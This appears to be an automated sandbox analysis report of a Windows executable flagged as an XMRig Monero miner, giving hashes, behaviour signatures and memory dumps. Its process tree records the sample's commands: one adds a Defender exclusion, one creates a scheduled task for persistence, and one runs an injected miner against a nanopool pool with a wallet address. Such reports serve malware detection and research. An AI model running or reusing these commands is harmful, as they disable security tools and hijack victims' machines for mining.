Overview

overview

10

Static

static

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    90s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2023 18:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe

  • Size

    834KB

  • MD5

    51fab718bb14209c2c812b25ce71b53e

  • SHA1

    305bb39cf29d7e8fb2614f15c73e1a77d8684b88

  • SHA256

    69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379

  • SHA512

    da9269709b223948cd60a2fd107f5934cb2fdf224901fbd1d354d807bd1a40361a89045177fc70c90d1860805dc524e733bd00f062cb26f03caff65e600a7400

  • SSDEEP

    24576:9xeYvng/hotknt6PxjAYaQkDwtfBPmPqh0UVm:D7vng/hFCf7kkbmPM0UVm

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe
    "C:\Users\Admin\AppData\Local\Temp\69a5d137e36fcf55a624146849248dd738dd615acc97e0bf6749123cc8047379.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4904
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "VANOZ" /tr "C:\ProgramData\Explorer\VANOZ.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "VANOZ" /tr "C:\ProgramData\Explorer\VANOZ.exe"
        3⤵
        • Creates scheduled task(s)
        PID:3792
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2532

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2532-170-0x000001D0E80C0000-0x000001D0E80E0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2532-169-0x000001D0E80E0000-0x000001D0E8100000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2532-168-0x000001D0E80C0000-0x000001D0E80E0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2532-167-0x000001D0E80E0000-0x000001D0E8100000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2532-166-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2532-165-0x000001D0E8080000-0x000001D0E80C0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2532-164-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2532-163-0x000001D0E8030000-0x000001D0E8050000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2532-162-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2532-161-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2532-159-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/4728-142-0x00000000002A0000-0x00000000003DA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4728-141-0x00007FFFED980000-0x00007FFFED9AB000-memory.dmp

    Filesize

    172KB

    Download

  • memory/4728-134-0x00007FFFED8E0000-0x00007FFFED97E000-memory.dmp

    Filesize

    632KB

    Download

  • memory/4728-151-0x00000000035B0000-0x00000000035F1000-memory.dmp

    Filesize

    260KB

    Download

  • memory/4728-150-0x00000000002A0000-0x00000000003DA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4728-152-0x00007FFFCEC30000-0x00007FFFCF6F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-135-0x00007FFFE9090000-0x00007FFFE90A2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4728-146-0x00007FFFEB170000-0x00007FFFEB197000-memory.dmp

    Filesize

    156KB

    Download

  • memory/4728-155-0x00007FFFCF9A0000-0x00007FFFCF9D5000-memory.dmp

    Filesize

    212KB

    Download

  • memory/4728-156-0x00007FFFCA380000-0x00007FFFCA482000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/4728-157-0x00007FFFEC680000-0x00007FFFEC6EB000-memory.dmp

    Filesize

    428KB

    Download

  • memory/4728-158-0x00007FFFEA540000-0x00007FFFEA57B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/4728-145-0x00007FFFCEC30000-0x00007FFFCF6F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-144-0x00007FFFCD4E0000-0x00007FFFCD62E000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/4728-143-0x00000000002A0000-0x00000000003DA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4728-133-0x00007FFFD0140000-0x00007FFFD01EA000-memory.dmp

    Filesize

    680KB

    Download

  • memory/4728-136-0x00007FFFCFA30000-0x00007FFFCFAED000-memory.dmp

    Filesize

    756KB

    Download

  • memory/4728-138-0x00007FFFCEC30000-0x00007FFFCF6F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-140-0x00000000035B0000-0x00000000035F1000-memory.dmp

    Filesize

    260KB

    Download

  • memory/4728-139-0x00000000002A0000-0x00000000003DA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4728-137-0x00007FFFEC090000-0x00007FFFEC231000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/4904-148-0x0000025AAD8F0000-0x0000025AAD912000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4904-149-0x00007FFFCEC30000-0x00007FFFCF6F1000-memory.dmp

    Filesize

    10.8MB

    Download